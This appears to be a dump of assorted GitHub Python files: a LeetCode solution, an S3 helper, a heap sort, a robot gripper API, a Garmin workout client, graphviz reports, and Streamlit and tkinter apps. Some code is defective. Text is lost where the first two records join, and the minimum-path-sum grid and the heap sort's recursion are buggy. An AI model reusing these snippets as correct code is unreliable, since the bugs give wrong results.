predict\\\\train.csv\")\r\ntraindata.drop(\"Id\",axis=1,inplace=True)\r\n\r\ntdatacorr=traindata.corr()\r\ntrainnull=traindata.isnull().sum()\r\n\r\n\r\ns=traindata.shape\r\nc=s[1]\r\nr=s[0]\r\ni=0\r\nfor x in traindata:\r\n if traindata[x].dtype == 'object':\r\n n=traindata[x].isnull()\r\n j=0\r\n while j int:\n m = len(grid[0])\n n = len(grid)\n\n result = [[0] * m] * n\n\n for i in range(n):\n for j in range(m):\n if i == 0 and j == 0:\n result[i][j] = grid[i][j]\n elif j == 0 and i != 0:\n result[i][j] = result[i - 1][j] + grid[i][j]\n elif j != 0 and i == 0:\n result[i][j] = result[i][j - 1] + grid[i][j]\n else:\n result[i][j] = min(result[i - 1][j], result[i][j - 1]) + grid[i][j]\n\n return result[-1][-1]\n\n\nif __name__ == '__main__':\n c = Solution()\n print(c.minPathSum([[1,2],[1,1]]))\n","repo_name":"Fabian1032908ru/Algorithm-and-Data-Structures","sub_path":"leetcode/New Naming/64_Minimum Path Sum.py","file_name":"64_Minimum Path Sum.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36547059518","text":"import boto3\nimport os\nimport json\nfrom collections import OrderedDict\nfrom typing import List\nimport tempfile\nimport time\nimport pandas as pd\n\nimport botocore\nimport botocore.errorfactory\nimport botocore.client\n\nfrom . import uuid_str, cmd\n\ns3 = boto3.client('s3')\ns3_res = boto3.resource('s3')\n\n\ndef path_join(*args):\n return \"/\".join(args)\n\n\ndef timestamp():\n return time.strftime(\"%y.%m.%d..%H.%M.%S\")\n\n\ndef create_bucket(bucket_name: str, ACL=\"private\", location=\"us-west-2\"):\n # s3.create_bucket(\n # Bucket=bucket_name,\n # )\n s3.create_bucket(\n ACL=ACL,\n Bucket=bucket_name,\n CreateBucketConfiguration={\n 'LocationConstraint': location,\n },\n )\n\n\ndef bucket_exist(bucket: str):\n try:\n s3_res.meta.client.head_bucket(Bucket=bucket)\n return True\n except botocore.client.ClientError:\n return False\n\n\ndef empty_bucket(bucket_name: str):\n bucket = s3_res.Bucket(bucket_name)\n bucket.objects.all().delete()\n\n\ndef delete_bucket(bucket_name: str):\n bucket = s3_res.Bucket(bucket_name)\n bucket.objects.all().delete()\n bucket.delete()\n\n\ndef create_dir(bucket_name: str, dir_name: str):\n s3.put_object(\n Bucket=bucket_name,\n Key=(dir_name + \"/\")\n )\n\n\ndef get_object(bucket: str, prefix: str):\n # Since the key is not known ahead of time, we need to get the\n # object's summary first and then fetch the object\n bucket = s3_res.Bucket(bucket)\n objs = [i for i in bucket.objects.filter(Prefix=prefix)]\n\n return objs[0].get()[\"Body\"].read()\n\n\ndef download_object_as(bucket, prefix, f=lambda x: pd.read_pickle(x).infer_objects()):\n with tempfile.TemporaryDirectory() as tmp_dir:\n tmp_file = tmp_dir + \"/{}\".format(prefix.split(\"/\")[-1])\n s3.download_file(bucket, prefix, tmp_file)\n return f(tmp_file)\n\n\ndef get_object_last_mod_time(bucket: str, prefix: str):\n bucket = s3_res.Bucket(bucket)\n objs = [i for i in bucket.objects.filter(Prefix=prefix)]\n\n return objs[0].last_modified\n\n\ndef upload_file(bucket: str, key: str = None, file_: str = None):\n assert not (key is None or file_ is None)\n s3_res.Bucket(bucket).upload_file(file_, key)\n\n print(\"s3:\", file_, \"uploaded, at\", bucket + \"/\" + key)\n\n\ndef dump_and_upload_file(blobs, key: str, bucket, auto_pad=True, raw=False):\n # create a temporary directory\n with tempfile.TemporaryDirectory() as tmp_dir:\n if auto_pad:\n tmp_file = path_join(tmp_dir, key.split(\"/\")[-1] + \"-\" + uuid_str())\n else:\n tmp_file = path_join(tmp_dir, key.split(\"/\")[-1])\n create_local_file(tmp_file)\n\n if (type(blobs) in {dict, list, OrderedDict}) and (not raw):\n with open(tmp_file, \"r+\", encoding='utf-8') as f:\n json.dump(blobs, f)\n elif type(blobs) == pd.DataFrame:\n blobs: pd.DataFrame\n blobs.to_pickle(tmp_file)\n else:\n with open(tmp_file, \"r+\", encoding='utf-8') as f:\n f.write(str(blobs))\n\n # TODO: add a lock done file, current version can use the input keys\n upload_file(file_=tmp_file, key=key, bucket=bucket)\n os.remove(tmp_file)\n\n\ndef create_local_file(path):\n basedir = os.path.dirname(path)\n if not os.path.exists(basedir):\n os.makedirs(basedir)\n open(path, \"w\").close()\n\n\ndef list_buckets() -> List[str]:\n # Call S3 to list current buckets\n response = s3.list_buckets()\n\n # Get a list of all bucket names from the response\n buckets = [bucket['Name'] for bucket in response['Buckets']]\n\n # Print out the bucket list\n # print(\"Bucket List: %s\" % buckets)\n return buckets\n\n\ndef list_objects(bucket, key):\n return [c[\"Key\"] for c in s3.list_objects_v2(\n Bucket=bucket,\n Prefix=key)[\"Contents\"]]\n\n\ndef backup_bucket(bucket: str, new_bucket=None):\n new_bucket = new_bucket if new_bucket else bucket + \"-backup\"\n cmd(\"aws s3 sync s3://{} s3://{}\".format(bucket, new_bucket))\n print(\"backup of {} at {}\".format(bucket, new_bucket))\n\n\ndef get_addr_from_bucket_key(bucket, key):\n return \"s3a://\" + bucket + \"/\" + key\n\n\n\"\"\"Log specific operations\"\"\"\n\n\ndef get_log_summaries(log_bucket, prefix: str = \"spark\") -> list:\n bucket = s3_res.Bucket(log_bucket)\n objs = [i for i in bucket.objects.filter(Prefix=prefix)]\n return objs\n\n\nif __name__ == '__main__':\n print(bucket_exist(\"microps-bench-spark-sql-perf-dataset-size\"))\n","repo_name":"perfd/perfd","sub_path":"apps/net/util/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":4466,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"3990675555","text":"\"\"\"\nOperadores Relacionais - Aula 4\n== igualdade\n> maior que\n>= maior que ou igual a\n< menor que\n<= menor que ou igual a\n!= diferente\n\"\"\"\nnome = input(\"Qual o seu nome? \")\nidade = input('Qual a sua idade? ')\n\nidade = int(idade)\n# Limite para pegar empréstimo\n\nidade_menor = 20 #muito jovem\nidade_maior = 30 #passou da idade\n\n\n\nif idade >= idade_menor and idade <= idade_maior:\n print(f'{nome}, empréstimo validado ')\nelse:\n print(f'{nome}, EMPRÉSTIMO NEGADO ')\n","repo_name":"Ygormorais/python-course","sub_path":"aula4/exemplo_1_1.py","file_name":"exemplo_1_1.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12577109739","text":"\nimport graphviz\n\ndef rep_MBR(table_content):\n s = graphviz.Digraph('MBR', filename='MAINS/Reportes/MBR.pdf',\n node_attr={'shape': 'plaintext'})\n\n # print(table_content)\n\n s.node('struct1', table_content)\n s.view()\n # print(s)\n\n\ndef rep_FDISK(total, part1, part2, part3, part4):\n s = graphviz.Digraph('DISK', filename='MAINS/Reportes/DISK.pdf',\n node_attr={'shape': 'plaintext'})\n if part4 > total:\n part4 = 0\n\n espacio_libre = total-part1-part2-part3-part4\n porcentaje = espacio_libre/total\n table_content = f\"\"\"<\n \n \n \n \n \n \n \n \n \n
MBRESPACIO LIBRE \\n {espacio_libre}M {porcentaje}%PARTICION 1 \\n {part1}PARTICION 2 \\n {part2}PARTICION 3 \\n {part3}PARTICION 4 \\n {part4}
>\"\"\"\n\n s.node('struct2', table_content)\n s.view()\n\n\ndef rep_SB(dot):\n s = graphviz.Digraph('SB', filename='MAINS/Reportes/SB.pdf',\n node_attr={'shape': 'plaintext'})\n\n # print(table_content)\n\n s.node('struct3', dot)\n s.view() \n\n\ndef rep_INODES(dot):\n s = graphviz.Digraph('INODES', filename='MAINS/Reportes/INODES.pdf',\n node_attr={'shape': 'plaintext'})\n\n # print(table_content)\n\n s.node('struct4', dot)\n s.view() \n\n\n\ndef rep_BLOQUES(dot):\n s = graphviz.Digraph('BLOCKS', filename='MAINS/Reportes/BLOCKS.pdf',\n node_attr={'shape': 'plaintext'})\n\n # print(table_content)\n\n s.node('struct5', dot)\n s.view() \n\n\ndef rep_Journaling():\n s = graphviz.Digraph('JS', filename='MAINS/Reportes/Journaling.pdf',\n node_attr={'shape': 'plaintext'})\n\n # print(table_content)\n table_content = f\"\"\"<\n \n \n \n \n \n \n \n \n \n
JOURNALING
>\"\"\"\n\n s.node('struct6', table_content)\n s.view() \n\n\ndef rep_LS():\n s = graphviz.Digraph('LS', filename='MAINS/Reportes/LS.pdf',\n node_attr={'shape': 'plaintext'})\n\n # print(table_content)\n table_content = f\"\"\"<\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
PERMISOSOWNERGRUPOSIZEFECHAHORA/td>\n TIPONAME/td>\n
>\"\"\"\n\n s.node('struct6', table_content)\n s.view() \n\n\ndef rep_Tree():\n s = graphviz.Digraph('TREE', filename='MAINS/Reportes/TREE.pdf',\n node_attr={'shape': 'plaintext'})\n\n # print(table_content)\n table_content = f\"\"\"<\n \n \n \n \n
TREE
>\"\"\"\n\n s.node(\"struck1\", \"TABLA INODO /.\")\n\n s.node('struct6', table_content)\n s.view() ","repo_name":"EdgarAlvarez-ROL/MIA_PR1","sub_path":"MAINS/graficas.py","file_name":"graficas.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23038457870","text":"# -*- coding: utf-8 -*-\n# @Author : Administrator\n# @DateTime : 2020/6/13 13:11\n# @FileName : heaq_sort.py\n# @SoftWare : PyCharm\n\n\"\"\"\n堆排序过程:\n1、构将大根堆:将待排序数组构造成一个大根堆(元素上升) -- build_heap 非叶子节点逆序递归调用heapify\n 确定最后一个非叶子节点(即last_node的parent_node)的index, 从这个点开始逆序遍历数组,对每个索引做heapify即可构造出大顶堆。\n 其中,heapify函数中,对于每次最大值交换影响到的节点,需要递归调用heapifty实现受影响节点的堆化\n2、固定一个最大值,由于大根堆的节点已经部分有序(父节点大于左右节点),秩序堆0节点做heapify即可\n 遍历剩下节点的tree, 将根节点元素最大元素和最后一个元素交换位置,固定该最大值,将剩余的节点再构建大根堆\n\"\"\"\n\n\ndef heaq_sort(tree):\n number = len(tree)\n build_heap(tree, number)\n for i in range(number - 1, 0, -1):\n # 交换堆顶最大值和最后一个节点,固定最大值\n tree[i], tree[0] = tree[0], tree[i]\n # 对当前堆(tree节点一直在减少,数量由i决定)的顶根节点做heapify即可\n heapify(tree, i, 0)\n return tree\n\n\ndef build_heap(tree, node_num):\n \"\"\"\n 对节点个数为 node_num 的数组构建大顶堆 (对节点调用heapify)\n 思路:\n 从最后一个非叶子节点开始,逆序遍历至根节点,堆每一个遍历的节点heapify\n :param tree: 当前待排序的数组\n :param node_num: 堆从根节点0处到索引 node_num - 1 处的 node_num 个节点\n :return:\n \"\"\"\n last_node_index = node_num - 1\n parent_index = (last_node_index - 1) // 2\n for i in range(parent_index, -1, -1):\n heapify(tree, node_num, i)\n\n\ndef heapify(tree, node_num, index):\n \"\"\"\n 对数组中索引为index的节点做heapify\n 在heapify过程中,由于最大值的数据交换影响到的节点需递归调用heapify\n 原址交换,不需要额外辅助空间\n 示例: [4, 7, 3] --> [7, 4, 3]\n :param tree: 带排序的数组\n :param node_num: 当前堆的节点数\n :param index: heapify操作的节点\n :return:\n \"\"\"\n if index >= node_num:\n return None\n left_node = 2 * index + 1\n right_node = 2 * index + 2\n max_index = index\n if left_node < node_num and tree[left_node] > tree[max_index]:\n max_index = left_node\n if right_node < node_num and tree[right_node] > tree[max_index]:\n max_index = right_node\n if max_index != index:\n # 最大值的点不是指定的index节点,需要交换数据将最大值交换到index\n tree[max_index], tree[index] = tree[index], tree[max_index]\n # 对交换后的max_index索引位的节点递归调用堆化\n heapify(items, node_num, max_index)\n\n\nif __name__ == '__main__':\n items = [12, 43, 6, 23, 98, 33, 65, 2, 3, 87, 51]\n res = heaq_sort(items)\n print(res)\n","repo_name":"freshklauser/datastructure_algorithm","sub_path":"abstract/sorts/heaq_sort.py","file_name":"heaq_sort.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14441465349","text":"from time import sleep\nimport streamlit as st\n\ndef app_header():\n st.title(\"E-Tickets, Compre seu ticket Já!\")\n st.write('____')\n\n ticket_input = st.text_input(\"Informe o título do Ticket\")\n st.write(' ')\n\n st.header(\"🎫 | Top 3 Tíckets Disponíveis!\")\n\n return ticket_input\n\ndef app_spaces_between():\n st.sidebar.write('___')\n st.sidebar.write('\\n\\n')\n \n return None\n\ndef progress_bar():\n progress = st.sidebar.progress(0)\n for per in range(100):\n sleep(.01)\n progress.progress(per+1)\n\n return progress","repo_name":"xGabrielR/E-Tickets","sub_path":"webapp/etickets_app/layout/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44906452408","text":"import re\nimport sys\nimport time\n\nfrom copy import deepcopy\nfrom math import fabs\n\nfrom json import (\n JSONDecoder,\n JSONEncoder,\n)\n\nfrom crustcrawler_core_msgs.msg import(\n EndEffectorCommand,\n EndEffectorState,\n)\n\nimport rospy\n\nimport crustcrawler_dataflow\n\nfrom crustcrawler_interface import settings\n\n\nclass Gripper(object):\n \"\"\"\n Interface class for a gripper on the Baxter Research Robot.\n \"\"\"\n def __init__(self):\n self.name = 'gripper'\n self._cmd_sender = rospy.get_name() + '_%s'\n self._cmd_sequence = 0\n\n ns = 'crustcrawler/end_effector/' + self.name + \"/\"\n\n self._state = None\n self.on_gripping_changed = crustcrawler_dataflow.Signal()\n self.on_moving_changed = crustcrawler_dataflow.Signal()\n\n self._parameters = dict()\n\n self._cmd_pub = rospy.Publisher(ns + 'command', EndEffectorCommand,\n queue_size=10)\n\n self._state_pub = rospy.Publisher(ns + 'set_state',\n EndEffectorState,\n latch=True,\n queue_size=10\n )\n\n self._state_sub = rospy.Subscriber(ns + 'state',\n EndEffectorState,\n self._on_gripper_state\n )\n\n # Wait for the gripper state message to be populated\n crustcrawler_dataflow.wait_for(\n lambda: not self._state is None,\n timeout=5.0,\n timeout_msg=(\"Failed to get state from %s\" %\n (ns + 'state',))\n )\n\n def _on_gripper_state(self, state):\n old_state = self._state\n self._state = deepcopy(state)\n if old_state is not None and old_state.gripping != state.gripping:\n self.on_gripping_changed(state.gripping == True)\n if old_state is not None and old_state.moving != state.moving:\n self.on_moving_changed(state.moving == True)\n\n def _inc_cmd_sequence(self):\n # manage roll over with safe value (maxint)\n self._cmd_sequence = (self._cmd_sequence % 0x7FFFFFFF) + 1\n return self._cmd_sequence\n\n def _clip(self, val):\n return max(min(val, 100.0), 0.0)\n\n def command(self, cmd, block=False, test=lambda: True,\n timeout=0.0, args=None):\n \"\"\"\n Raw command call to directly control gripper.\n\n @type cmd: str\n @param cmd: string of known gripper commands\n @type block: bool\n @param block: command is blocking or non-blocking [False]\n @type test: func\n @param test: test function for command validation\n @type timeout: float\n @param timeout: timeout in seconds for command evaluation\n @type args: dict({str:float})\n @param args: dictionary of parameter:value\n \"\"\"\n ee_cmd = EndEffectorCommand()\n ee_cmd.id = self.hardware_id()\n ee_cmd.command = cmd\n ee_cmd.sender = self._cmd_sender % (cmd,)\n ee_cmd.sequence = self._inc_cmd_sequence()\n ee_cmd.args = ''\n if args != None:\n ee_cmd.args = JSONEncoder().encode(args)\n seq_test = lambda: (self._state.command_sender == ee_cmd.sender and\n (self._state.command_sequence == ee_cmd.sequence\n or self._state.command_sequence == 0))\n self._cmd_pub.publish(ee_cmd)\n if block:\n finish_time = rospy.get_time() + timeout\n cmd_seq = crustcrawler_dataflow.wait_for(\n test=seq_test,\n timeout=timeout,\n raise_on_error=False,\n body=lambda: self._cmd_pub.publish(ee_cmd)\n )\n if not cmd_seq:\n seq_msg = ((\"Timed out on gripper command acknowledgement for\"\n \" %s:%s\") % (self.name, ee_cmd.command))\n rospy.logdebug(seq_msg)\n time_remain = max(0.5, finish_time - rospy.get_time())\n return crustcrawler_dataflow.wait_for(\n test=test,\n timeout=time_remain,\n raise_on_error=False,\n body=lambda: self._cmd_pub.publish(ee_cmd)\n )\n else:\n return True\n\n def reset_custom_state(self, timeout=2.0):\n \"\"\"\n Resets default state for custom grippers\n\n @return: True if custom gripper state reset successfully\n @rtype: bool\n \"\"\"\n state_true = EndEffectorState.STATE_TRUE\n state_unknown = EndEffectorState.STATE_UNKNOWN\n # Create default state message\n state_msg = EndEffectorState()\n for idx, attr in enumerate(state_msg.__slots__):\n if 'int' in state_msg._slot_types[idx]:\n setattr(state_msg, attr, state_unknown)\n setattr(state_msg, 'enabled', state_true)\n self._state_pub.publish(state_msg)\n\n # Verify state reset successfully\n test = lambda: (self._state.enabled == state_true and\n self._state.calibrated == state_unknown and\n self._state.ready == state_unknown and\n self._state.position == 0.0\n )\n return crustcrawler_dataflow.wait_for(\n test=test,\n timeout=timeout,\n raise_on_error=False,\n body=lambda: self._state_pub.publish(state_msg)\n )\n\n def reset(self, block=True, timeout=2.0):\n \"\"\"\n Resets the gripper state removing any errors.\n\n @type timeout: float\n @param timeout: timeout in seconds for reset success\n @type block: bool\n @param block: command is blocking or non-blocking [False]\n \"\"\"\n cmd = EndEffectorCommand.CMD_RESET\n return self.command(\n cmd,\n block,\n test=lambda: (self._state.error == False and\n self._state.ready == True),\n timeout=timeout,\n )\n\n def _cmd_reboot(self, block=True, timeout=5.0):\n \"\"\"\n Power cycle the gripper, removing calibration information.\n\n Basic call to the gripper reboot command. Waits for gripper to return\n ready state but does not clear errors that could occur during boot.\n Highly recommended to use the clean reboot() command instead.\n\n @type timeout: float\n @param timeout: timeout in seconds for reboot success\n @type block: bool\n @param block: command is blocking or non-blocking [False]\n \"\"\"\n cmd = EndEffectorCommand.CMD_REBOOT\n success = self.command(\n cmd,\n block,\n test=lambda: (self._state.enabled == True and\n self._state.ready == True),\n timeout=timeout\n )\n rospy.sleep(1.0) # Allow extra time for reboot to complete\n self.set_parameters(defaults=True)\n return success\n\n def reboot(self, timeout=5.0, delay_check=0.1):\n \"\"\"\n \"Clean\" reboot of gripper, removes calibration and errors.\n\n Robust version of gripper reboot command; recommended to use this\n function for rebooting grippers.\n\n Calls the basic reboot gripper command to power cycle the gripper\n (_cmd_reboot()) and then checks for errors after reboot, calling\n reset to clear errors if needed.\n\n @type timeout: float\n @param timeout: timeouts in seconds for reboot & reset\n @type delay_check: float\n @param delay_check: seconds after reboot before error check\n \"\"\"\n self._cmd_reboot(block=True, timeout=timeout)\n rospy.sleep(delay_check)\n if self.error():\n if not self.reset(block=True, timeout=timeout):\n rospy.logerr(\"Failed to reset gripper error after reboot.\")\n return False\n return True\n\n def clear_calibration(self, block=True, timeout=2.0):\n \"\"\"\n Clear calibration information from gripper.\n\n Allows (and requires) new gripper calibration to be run.\n\n @type timeout: float\n @param timeout: timeout in seconds for success\n @type block: bool\n @param block: command is blocking or non-blocking [False]\n \"\"\"\n cmd = EndEffectorCommand.CMD_CLEAR_CALIBRATION\n return self.command(\n cmd,\n block,\n test=lambda: (self._state.calibrated == False and\n self._state.ready == True),\n timeout=timeout\n )\n\n def calibrate(self, block=True, timeout=5.0):\n \"\"\"\n Calibrate the gripper setting maximum and minimum travel distance.\n\n @type timeout: float\n @param timeout: timeout in seconds for calibration success\n @type block: bool\n @param block: command is blocking or non-blocking [False]\n @rtype: bool\n @return: Returns True if calibration succeeds.\n \"\"\"\n # clear any previous calibration and any current errors\n if self.calibrated():\n self.clear_calibration()\n if self.error():\n self.reset(block=block)\n\n cmd = EndEffectorCommand.CMD_CALIBRATE\n success = self.command(\n cmd,\n block,\n test=lambda: (self._state.calibrated == True and\n self._state.ready == True),\n timeout=timeout\n )\n return success\n\n def stop(self, block=True, timeout=5.0):\n \"\"\"\n Stop the gripper at the current position and apply holding force.\n\n @type timeout: float\n @param timeout: timeout in seconds for stop success\n @type block: bool\n @param block: command is blocking or non-blocking [False]\n \"\"\"\n cmd = EndEffectorCommand.CMD_STOP\n stop_test = lambda: self._state.moving == False\n return self.command(\n cmd,\n block,\n test=stop_test,\n timeout=timeout,\n )\n\n def command_position(self, position, block=False, timeout=5.0):\n \"\"\"\n Command the gripper position movement.\n\n @type position: float\n @param position: in % 0=close 100=open\n\n From minimum/closed (0.0) to maximum/open (100.0)\n \"\"\"\n if self._state.calibrated != True:\n msg = \"Unable to command %s position until calibrated\" % self.name\n rospy.logwarn(msg)\n return False\n\n cmd = EndEffectorCommand.CMD_GO\n arguments = {\"position\": self._clip(position)}\n cmd_test = lambda: (self._state.gripping == True)\n return self.command(\n cmd,\n block,\n test=cmd_test,\n timeout=timeout,\n args=arguments\n )\n\n def open(self, block=False, timeout=5.0):\n \"\"\"\n Commands maximum gripper position.\n\n @type block: bool\n @param block: open command is blocking or non-blocking [False]\n @type timeout: float\n @param timeout: timeout in seconds for open command success\n \"\"\"\n return self.command_position(position=100.0, block=block,\n timeout=timeout)\n\n def close(self, block=False, timeout=5.0):\n \"\"\"\n Commands minimum gripper position.\n\n @type block: bool\n @param block: close command is blocking or non-blocking [False]\n @type timeout: float\n @param timeout: timeout in seconds for close command success\n \"\"\"\n return self.command_position(position=0.0, block=block,\n timeout=timeout)\n\n def calibrated(self):\n \"\"\"\n Returns bool describing gripper calibration state.\n (0:Not Calibrated, 1:Calibrated)\n\n @rtype: bool\n @return: False if Not Calibrated, True if Calibrated.\n Grippers that cannot calibrate should return True\n (i.e. \"Always calibrated\").\n \"\"\"\n return self._state.calibrated == True\n\n def ready(self):\n \"\"\"\n Returns bool describing if the gripper ready, i.e. is calibrated, not\n busy (as in resetting or rebooting), and not moving.\n\n @rtype: bool\n @return: True if gripper is not busy\n \"\"\"\n return self._state.ready == True\n\n def moving(self):\n \"\"\"\n Returns bool describing if the gripper is in motion\n\n @rtype: bool\n @return: True if gripper is in motion\n \"\"\"\n return self._state.moving == True\n\n def gripping(self):\n \"\"\"\n Returns bool describing if the position move has been preempted by a\n position command exceeding the moving_force threshold denoting a grasp.\n\n @rtype: bool\n \"\"\"\n return self._state.gripping == True\n\n def missed(self):\n \"\"\"\n Returns bool describing if the position move has completed without\n exceeding the moving_force threshold denoting a grasp\n\n @rtype: bool\n \"\"\"\n return self._state.missed == True\n\n def error(self):\n \"\"\"\n Returns bool describing if the gripper is in an error state.\n\n Error states can be caused by over/undervoltage, over/under current,\n motor faults, etc.\n\n Errors can be cleared with a gripper reset. If persistent please\n contact Rethink Robotics for further debugging.\n\n @rtype: bool\n \"\"\"\n return self._state.error == True\n\n def position(self):\n \"\"\"\n Returns the current gripper position as a ratio (0-100) of the total\n gripper travel.\n\n @rtype: float\n \"\"\"\n return deepcopy(self._state.position)\n\n def force(self):\n \"\"\"\n Returns the current measured gripper force as a ratio (0-100) of the\n total force applicable.\n\n @rtype: float\n \"\"\"\n return deepcopy(self._state.force)\n\n def has_force(self):\n \"\"\"\n Returns bool describing if the gripper is capable of force control.\n\n @rtype: bool\n \"\"\"\n return self._prop.controls_force == True\n\n def has_position(self):\n \"\"\"\n Returns bool describing if the gripper is capable of position control.\n\n @rtype: bool\n \"\"\"\n return self._prop.controls_position == True\n\n def hardware_id(self):\n \"\"\"\n Returns unique hardware id number. This is required for sending\n commands to the gripper.\n\n @rtype: int\n \"\"\"\n return deepcopy(self._state.id)\n\n def hardware_name(self):\n \"\"\"\n Returns string describing the gripper hardware.\n\n @rtype: str\n \"\"\"\n return deepcopy(self._prop.product)\n","repo_name":"ghanimmukhtar/crustcrawler","sub_path":"crustcrawler_interface/src/crustcrawler_interface/gripper.py","file_name":"gripper.py","file_ext":"py","file_size_in_byte":15397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"31399185001","text":"import http\nimport json\nimport logging\nimport os\nimport re\nimport sys\n\nimport cloudscraper\n\n\nclass GarminClient(object):\n _SSO_LOGIN_URL = \"https://sso.garmin.com/sso/signin\"\n _WORKOUT_SERVICE_URL = \"https://connect.garmin.com/proxy/workout-service\"\n\n _REQUIRED_HEADERS = {\n \"Referer\": \"https://connect.garmin.com/modern/workouts\",\n \"nk\": \"NT\"\n }\n\n _LOG = logging.getLogger(__name__)\n\n def __init__(self, username, password, cookie_jar):\n self.username = username\n self.password = password\n self.cookie_jar = cookie_jar\n self.session = None\n\n def __enter__(self):\n self._connect()\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n self._disconnect()\n\n def list_workouts(self, batch_size=100):\n assert self.session\n\n for start_index in range(0, sys.maxsize, batch_size):\n params = {\n \"start\": start_index,\n \"limit\": batch_size\n }\n response = self.session.get(GarminClient._WORKOUT_SERVICE_URL + \"/workouts\", params=params, headers=GarminClient._REQUIRED_HEADERS)\n response.raise_for_status()\n\n response_jsons = json.loads(response.text)\n if not response_jsons or response_jsons == []:\n break\n\n for response_json in response_jsons:\n yield response_json\n\n def get_workout(self, workout_id):\n assert self.session\n\n response = self.session.get(GarminClient._WORKOUT_SERVICE_URL + \"/workout/%s\" % workout_id, headers=GarminClient._REQUIRED_HEADERS)\n response.raise_for_status()\n\n return json.loads(response.text)\n\n def download_workout(self, workout_id, file):\n assert self.session\n\n response = self.session.get(GarminClient._WORKOUT_SERVICE_URL + \"/workout/FIT/%s\" % workout_id)\n response.raise_for_status()\n\n with open(file, \"wb\") as f:\n f.write(response.content)\n\n def save_workout(self, workout):\n assert self.session\n\n response = self.session.post(GarminClient._WORKOUT_SERVICE_URL + \"/workout\",\n headers=GarminClient._REQUIRED_HEADERS, json=workout)\n response.raise_for_status()\n\n return json.loads(response.text)\n\n def update_workout(self, workout_id, workout):\n assert self.session\n\n response = self.session.put(GarminClient._WORKOUT_SERVICE_URL + \"/workout/%s\" % workout_id,\n headers=GarminClient._REQUIRED_HEADERS, json=workout)\n response.raise_for_status()\n\n def delete_workout(self, id):\n assert self.session\n\n response = self.session.delete(GarminClient._WORKOUT_SERVICE_URL + \"/workout/%s\" % id,\n headers=GarminClient._REQUIRED_HEADERS)\n response.raise_for_status()\n\n def _connect(self):\n self.session = cloudscraper.CloudScraper()\n self.session.cookies = http.cookiejar.LWPCookieJar(self.cookie_jar)\n\n if os.path.isfile(self.cookie_jar):\n self.session.cookies.load(ignore_discard=True, ignore_expires=True)\n\n response = self.session.get(\"https://connect.garmin.com/modern/settings\", allow_redirects=False)\n if response.status_code != 200:\n self._LOG.info(\"Authenticate user '%s'\", self.username)\n self._authenticate()\n else:\n self._LOG.info(\"User '%s' already authenticated\", self.username)\n\n def _disconnect(self):\n if self.session:\n self.session.cookies.save(ignore_discard=True, ignore_expires=True)\n self.session.close()\n self.session = None\n\n def _authenticate(self):\n assert self.session\n\n form_data = {\n \"username\": self.username,\n \"password\": self.password,\n \"embed\": \"false\"\n }\n request_params = {\n \"service\": \"https://connect.garmin.com/modern\"\n }\n headers = {'origin': 'https://sso.garmin.com'}\n\n auth_response = self.session.post(\n GarminClient._SSO_LOGIN_URL, headers=headers, params=request_params, data=form_data)\n auth_response.raise_for_status()\n\n auth_ticket_url = self._extract_auth_ticket_url(auth_response.text)\n\n response = self.session.get(auth_ticket_url)\n response.raise_for_status()\n\n @staticmethod\n def _extract_auth_ticket_url(auth_response):\n match = re.search(r'response_url\\s*=\\s*\"(https:[^\"]+)\"', auth_response)\n if not match:\n raise Exception(\"Unable to extract auth ticket URL from:\\n%s\" % auth_response)\n auth_ticket_url = match.group(1).replace(\"\\\\\", \"\")\n return auth_ticket_url\n","repo_name":"chipbite/garmin-workouts","sub_path":"garminworkouts/garmin/garminclient.py","file_name":"garminclient.py","file_ext":"py","file_size_in_byte":4756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"33147744180","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 15 15:23:30 2020\r\n\r\n@author: singh\r\n\"\"\"\r\n\r\nfrom tkinter import *\r\nimport tkinter.messagebox\r\nfrom tkinter import filedialog\r\nfrom pygame import mixer\r\nimport os\r\nfrom mutagen.mp3 import MP3\r\nimport threading\r\nimport time\r\nfrom tkinter import ttk\r\n\r\nmixer.init()\r\nroot=Tk()\r\nroot.configure(bg='dodger blue')\r\nroot.geometry('500x300')\r\nroot.title(\"Melody\")\r\nroot.iconbitmap(r'C:\\Users\\singh\\PycharmProjects\\music player\\Images\\music.ico')\r\n\r\nstatusbar = Label(root, text=\"Welcome to Melody\", relief=SUNKEN, anchor=W)\r\nstatusbar.pack(side=BOTTOM, fill=X)\r\n\r\n# Create menu\r\nmenubar = Menu(root)\r\nroot.config(menu=menubar)\r\n\r\nplaylist = []\r\n\r\ndef browse_file():\r\n global filename_path\r\n filename_path = filedialog.askopenfilename()\r\n add_to_playlist(filename_path)\r\n\r\ndef add_to_playlist(filename):\r\n filename = os.path.basename(filename)\r\n index = 0\r\n playlistbox.insert(index, filename)\r\n playlist.insert(index, filename_path)\r\n index += 1\r\n\r\n# Create the submenu\r\nsubMenu = Menu(menubar, tearoff=0)\r\nmenubar.add_cascade(label=\"File\", menu=subMenu)\r\nsubMenu.add_command(label=\"Open\")\r\nsubMenu.add_command(label=\"Exit\",command=root.destroy)\r\n\r\ndef about_us():\r\n tkinter.messagebox.showinfo('About Melody', 'This is a music player build using Python Tkinter by @ssbrar')\r\n\r\nsubMenu = Menu(menubar, tearoff=0)\r\nmenubar.add_cascade(label=\"Help\", menu=subMenu)\r\nsubMenu.add_command(label=\"About Us\", command=about_us)\r\n\r\n\r\n\r\nleftframe = Frame(root,bg='dodger blue')\r\nleftframe.pack(side=LEFT, padx=30)\r\n\r\nplaylistbox = 